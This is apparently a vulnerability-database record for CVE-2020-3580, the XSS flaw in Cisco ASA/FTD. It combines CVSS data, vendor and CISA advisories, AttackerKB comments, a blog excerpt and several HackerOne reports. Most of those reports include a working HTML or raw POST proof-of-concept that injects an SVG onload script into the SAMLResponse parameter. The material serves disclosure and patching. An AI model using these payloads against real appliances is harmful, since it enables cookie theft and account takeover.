"LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-28T06:51:26", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Cisco Firepower Threat Defense", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-08-13T16:36:28", "id": "83C1EA82-471C-5783-8685-73DB774CDE06", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:12", "description": "A cross site scripting vulnerability exists in Cisco Adaptive Security Appliance. 
Successful exploitation of this vulnerability would allow remote attackers to inject an arbitrary web script into the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-07-15T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Adaptive Security Appliance Cross Site Scripting (CVE-2020-3580)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-15T00:00:00", "id": "CPAI-2020-3375", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T02:27:22", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found the following host to be vulnerable to CVE 2020-3580 which is POST BASED XSS.\n\nVulnerable URL: https://\u2588\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\n\n## Impact\n\nAttackers can steal cookies and even takeover accounts and perform different malicious activities.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nSave Following code as xss.html and open in any browser:\n<html>\n 
<body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\""><svg/onload=alert('XSS')>\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-26T11:36:25", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-29T19:45:44", "id": "H1:1245048", "href": "https://hackerone.com/reports/1245048", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:20", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found the following host to be vulnerable to CVE 2020-3580 which is POST BASED XSS.\n\nVulnerable URL: 
https://\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\n\n## Impact\n\nAttackers can steal cookies and even takeover accounts and perform different malicious activities.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nSave following code as xss.html and open in browser:\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\""><svg/onload=alert('XSS')>\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-26T11:42:33", "type": "hackerone", "title": "U.S. 
Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-29T19:46:20", "id": "H1:1245055", "href": "https://hackerone.com/reports/1245055", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:12", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. \n\n Steps To Reproduce \n\n Go to this URL \n\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588.mil'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='"><svg/onload=alert(document.cookies)>'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. 
\n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:31:41", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588.mil]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-08-19T19:04:13", "id": "H1:1277383", "href": "https://hackerone.com/reports/1277383", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:25:03", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580, This vulnerability targets the saml service within the VPN. 
It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n## Impact\n\nWith this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco ASA\n\n## CVE Numbers\nCVE-2020-3580\n\n## Steps to Reproduce\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\""><svg/onload=alert('XSS')>\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\nPatch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-06-18T19:23:56", "type": "hackerone", "title": "U.S. 
Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-09-06T18:55:29", "id": "H1:1606068", "href": "https://hackerone.com/reports/1606068", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:02", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. \n\n Steps To Reproduce \n\n Go to this URL \n\n http://www.info-sec.cl/post-xss-\u2588\u2588\u2588.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588\u2588\u2588\u2588'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='"><svg/onload=alert(document.cookies)>'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. 
\n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:32:45", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-09T19:57:12", "id": "H1:1277389", "href": "https://hackerone.com/reports/1277389", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:02", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. 
\n\n Steps To Reproduce \n\n Go to this URL \n\n http://www.info-sec.cl/post-xss-\u2588\u2588\u2588\u2588\u2588\u2588\u2588.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='"><svg/onload=alert(document.cookies)>'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. \n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:33:02", "type": "hackerone", "title": "U.S. 
Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-09T19:56:21", "id": "H1:1277392", "href": "https://hackerone.com/reports/1277392", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:26:56", "bounty": 0.0, "description": "\u2588\u2588\u2588\u2588 appears to be affected by the Cisco ASA XSS CVE-2020-3580, This vulnerablity is targets the saml service within the VPN. 
It is triggered via a POST request to /+CSCOE+/saml/sp/acs?tgname=a\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n## Impact\n\nWith this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco ASA\n\n## CVE Numbers\nCVE-2020-3580\n\n## Steps to Reproduce\nsend a POST request from browser: \n\nPOST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\nConnection: close\nsec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nContent-Length: 40\n\nSAMLResponse=\"><svg/onload=alert('xss')>\n\n## Suggested Mitigation/Remediation Actions\nPatch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T21:34:35", "type": "hackerone", "title": "U.S. 
Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588 - XSS - CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-29T17:44:43", "id": "H1:1243650", "href": "https://hackerone.com/reports/1243650", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. 
Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco ASA and FTD XSS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3580", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "attackerkb": [{"lastseen": "2023-03-04T17:20:04", "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. 
A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.\n\n \n**Recent assessments:** \n \n**MadDud** at June 25, 2021 12:48pm UTC reported:\n\nProof of Concept of the XSS attack is publicly available.\n\nThis is an XSS attack, which doesn\u2019t require authentication to plant the code, but it requires user interaction (visit something in web interface) to trigger it.\n\nOriginal tweet: <https://twitter.com/ptswarm/status/1408050644460650502> \nCopy of tweet (screenshot) and analysis <https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>\n\n**ccondon-r7** at June 25, 2021 8:24pm UTC reported:\n\nProof of Concept of the XSS attack is publicly available.\n\nThis is an XSS attack, which doesn\u2019t require authentication to plant the code, but it requires user interaction (visit something in web interface) to trigger it.\n\nOriginal tweet: <https://twitter.com/ptswarm/status/1408050644460650502> \nCopy of tweet (screenshot) and analysis <https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-3580", "bulletinFamily": 
"info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3580"], "modified": "2020-10-29T00:00:00", "id": "AKB:6D848E58-548B-45BE-A600-D0B5780BEB50", "href": "https://attackerkb.com/topics/ELL5aQv129/cve-2020-3580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2023-01-24T06:15:58", "description": "Update June 28, 2021: Cisco has become aware that public exploit code exists for CVE-2020-3580, and this vulnerability is being actively exploited.\n\nMultiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device.\n\nThe vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information.\n\nNote: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products [\"#vp\"] section.\n\nCisco has released software updates that address these vulnerabilities. 
There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

Advisory record: CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE, "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Interface Cross-Site Scripting Vulnerabilities" (type: cisco, family: software), published 2020-10-21, modified 2021-06-28. CVEs: CVE-2020-3580, CVE-2020-3581, CVE-2020-3582, CVE-2020-3583. CVSS 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

Blog record (avleonov): "Last Week’s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", published 2021-06-28, id AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9, http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/. CVEs mentioned: CVE-2020-14871, CVE-2020-3580, CVE-2020-5135, CVE-2021-1497, CVE-2021-20019, CVE-2021-3044. CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C); CVSSv3 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Hello, today I want to experiment with a new format. I will be reading last week's news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).

Let's start with some new public exploits.

 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA), CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.
